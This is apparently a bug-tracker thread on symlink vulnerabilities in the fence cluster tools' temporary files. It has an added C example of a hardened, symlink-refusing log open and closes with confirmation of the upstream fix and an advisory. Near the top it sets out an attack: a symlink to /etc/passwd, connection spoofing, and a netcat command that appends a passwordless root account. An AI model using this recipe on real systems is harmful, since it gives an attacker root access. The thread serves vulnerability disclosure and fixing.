/usr/sbin/fence_apc logs to /tmp/apclog, if you use verbose mode:
./fence_apc -v -l foo -p bar -n 1 -a 192.168.0.1
it will write into that file.
a) link to /etc/passwd
b) redirect the connection (e.g. arp-spoof, dns-spoof)
you can do this on the host you redirected to:
echo "hacked::0:0:root:/root:/bin/bash" | nc -l -p 23
And the account will be appended to /etc/passwd.
Honestly I doubt that will ever happen in reality, but it's possible.
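The root cause in the report above is a log file opened by name in a world-writable directory, so that a symlink planted under that name redirects the append. The following is an added example, not fence_apc's own code or the upstream fix: a hardened open that refuses symlinks with O_NOFOLLOW and checks the opened object is a regular file owned by the caller, plus a self-contained demo that builds the symlink layout described in the report in a throwaway directory and verifies the hardened open rejects it. Function names (open_log_nofollow, run_demo) and the constructed "victim" file are assumptions for the illustration.

```c
#define _GNU_SOURCE
#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>
#include <unistd.h>

/* Hardened replacement for an "append to /tmp/apclog" style log open.
 * O_NOFOLLOW makes a symlink at the final path component fail with ELOOP;
 * the fstat check rejects anything that is not a regular file owned by
 * the calling user. The file is never truncated. Returns an fd or -1. */
int open_log_nofollow(const char *path)
{
    int fd = open(path, O_WRONLY | O_CREAT | O_APPEND | O_NOFOLLOW | O_CLOEXEC, 0600);
    if (fd < 0)
        return -1;          /* errno == ELOOP when the path was a symlink */
    struct stat st;
    if (fstat(fd, &st) != 0 || !S_ISREG(st.st_mode) || st.st_uid != geteuid()) {
        close(fd);
        errno = EPERM;
        return -1;
    }
    return fd;
}

/* Self-contained demonstration (assumed helper, not part of fence):
 * creates a temporary directory holding a constructed "victim" file and a
 * symlink named "apclog" pointing at it, the layout the report describes,
 * then checks that the hardened open refuses the symlink, leaves the victim
 * untouched, and still creates an ordinary log file. Returns 0 on success,
 * otherwise the number of the step that failed. */
int run_demo(void)
{
    char dir[] = "/tmp/fencelog-demo-XXXXXX";
    if (mkdtemp(dir) == NULL)
        return 1;
    char victim[256], link[256], plain[256];
    snprintf(victim, sizeof victim, "%s/victim", dir);
    snprintf(link, sizeof link, "%s/apclog", dir);
    snprintf(plain, sizeof plain, "%s/plain.log", dir);

    /* constructed stand-in for /etc/passwd: one 32-byte line */
    FILE *f = fopen(victim, "w");
    if (!f)
        return 2;
    fputs("root:x:0:0:root:/root:/bin/bash\n", f);
    fclose(f);
    if (symlink(victim, link) != 0)
        return 3;

    int rc = 0;

    /* step 4: the symlinked log name must be rejected with ELOOP */
    int fd = open_log_nofollow(link);
    if (fd >= 0 || errno != ELOOP)
        rc = 4;
    if (fd >= 0)
        close(fd);

    /* step 5: the victim file is unchanged, still exactly 32 bytes */
    struct stat st;
    if (rc == 0 && (stat(victim, &st) != 0 || st.st_size != 32))
        rc = 5;

    /* step 6: a plain, not-yet-existing log path is created and writable */
    if (rc == 0) {
        fd = open_log_nofollow(plain);
        if (fd < 0 || write(fd, "ok\n", 3) != 3)
            rc = 6;
        if (fd >= 0)
            close(fd);
    }

    unlink(plain);
    unlink(link);
    unlink(victim);
    rmdir(dir);
    return rc;
}

int main(void)
{
    int rc = run_demo();
    if (rc == 0)
        printf("hardened open refused the symlink and left the target untouched\n");
    else
        printf("demo step %d failed\n", rc);
    return rc;
}
```

O_NOFOLLOW only protects the last path component; a log that must live in a shared directory such as /tmp should additionally be created with mkstemp() or, better, written under a directory only the service can write to, which is the approach the later comments describe as the upstream tmpfile fixes.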
Seems to be a completely updated version.
Seems there is also a hole in fence_manual / fence_ack_manual fifo handling, it's a different bug, but I guess we can fix both in this bug #.
The (1) fence_apc and (2) fence_apc_snmp programs, as used in (a)
fence 2.02.00-r1 and possibly (b) cman, when running in verbose mode,
allow local users to append to arbitrary files via a symlink attack
on the apclog temporary file.
fence_manual in fence allows local users to modify arbitrary files
via a symlink attack on the fence_manual.fifo temporary file.
ha-cluster: Looks like you did some bumping. Can you please ascertain/confirm whether this issue is fixed in your newer ebuilds?
(In reply to comment #4)
> ha-cluster: Looks like you did some bumping. Can you please ascertain/confirm
> whether this issue is fixed in your newer ebuilds?
I found this at the Debian bugtracker:
* New upstream release version 2.03.09.
- Upstream code audit fixes several tmpfile race conditions, among
them CVE-2008-4579 and CVE-2008-4580. (Closes: #496410)
We have that version in the tree, stabled; old versions are removed.
So, GLSA voting time!
Ready to vote, I vote YES.
What about you, a3li? ;)
There is no sys-cluster/fence in portage any more.
GLSA 201009-09, thanks everyone.